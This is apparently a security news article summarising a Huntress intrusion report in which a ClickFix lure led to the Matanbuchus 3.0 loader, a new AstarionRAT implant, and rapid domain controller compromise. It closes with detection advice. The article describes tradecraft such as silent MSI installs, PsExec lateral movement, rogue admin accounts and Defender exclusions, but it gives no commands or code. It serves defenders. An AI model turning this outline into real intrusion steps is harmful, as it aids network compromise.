Matanbuchus 3.0 Loader Delivers AstarionRAT in Hands-On Intrusion

Huntress disclosed details of a hands-on-keyboard intrusion that began with a ClickFix infection and ended with attackers moving laterally across domain controllers within 40 minutes. The attack chain deployed Matanbuchus 3.0, a loader that returned after a year-long hiatus, and dropped a previously undocumented RAT the researchers dubbed AstarionRAT.

The incident response, published by Huntress this week, provides a detailed breakdown of how initial access through social engineering escalates to full network compromise when defenders don't intervene quickly.

ClickFix Continues to Work

The intrusion started with ClickFix, the social engineering technique that tricks users into executing malicious commands themselves. We've covered multiple ClickFix variants this month, and the technique remains effective because it bypasses browser and email security controls.

In this case, a fake security alert prompted the victim to copy and paste a command into the Windows Run dialog. That command triggered a PowerShell chain that ultimately installed Matanbuchus through a silent MSI deployment.

Silent MSI installations avoid user notification dialogs, letting malware install without visible prompts. The victim sees nothing unusual after pasting the initial command.

Matanbuchus Returns

Matanbuchus is a Malware-as-a-Service loader that went quiet around May 2025. Version 3.0 represents a complete code rewrite with expanded capabilities:

• Support for running EXE, DLL, shellcode, and MSI payloads from disk or in memory
• Reverse shell functionality via CMD and PowerShell
• WQL query execution for system reconnaissance
• High-quality screenshot capture
• A morphing engine to maintain clean builds without crypters
• Multiple delivery formats including MSI, EXE, DLL, ISO, and BIN

The subscription pricing reflects the tooling's sophistication: $10,000/month for the HTTPS version and $15,000/month for the DNS-based variant. Those prices put Matanbuchus in the premium tier of loader services, competing with tools typically reserved for ransomware operators and sophisticated threat groups.

AstarionRAT: A New Custom Implant

The most interesting element was the payload: a fully featured RAT that Huntress had never seen before. AstarionRAT supports 24 distinct commands:

• SOCKS5 proxy for tunneling traffic through infected hosts
• Credential theft targeting browsers and system stores
• Reflective code loading to execute additional payloads in memory
• Port scanning for internal network reconnaissance
• Shell execution via CMD and PowerShell

The RAT uses RSA-encrypted command-and-control traffic disguised as application telemetry. This design helps the traffic blend with legitimate software beacon patterns, complicating network-based detection.

Rapid Lateral Movement

The operator returned the next day after initial infection. What happened next demonstrates why initial access is just the beginning:

Within 40 minutes, the attacker:

• Moved laterally to a Windows Server
• Compromised two domain controllers
• Used PsExec for remote execution
• Created rogue administrator accounts
• Added Windows Defender exclusions to prevent detection

The speed suggests either automation, experience, or both. Once attackers have working credentials and a foothold, domain compromise doesn't require sophisticated techniques, just systematic execution.

Defensive Takeaways

This intrusion follows patterns we've tracked across ransomware deployments and financially motivated attacks. The combination of social engineering, commodity malware, and hands-on operation makes these threats difficult to prevent entirely.

Detection opportunities exist at multiple stages:

1. ClickFix execution - Monitor for suspicious PowerShell launched from user-initiated commands
2. Silent MSI installation - Alert on msiexec.exe with quiet installation flags
3. Unusual scheduled tasks - Matanbuchus establishes persistence through scheduled tasks
4. Lateral movement indicators - PsExec usage, remote service creation, new administrator accounts

Organizations running endpoint detection should review whether their tools catch the specific behavioral patterns described. The Huntress report includes IOCs and detection signatures for those wanting to validate coverage.

For teams still struggling with ClickFix-style attacks, the fundamental defense remains user education. No technical control stops a user who willingly executes malicious commands. Training users to recognize social engineering prompts, however effective they appear, remains the primary countermeasure.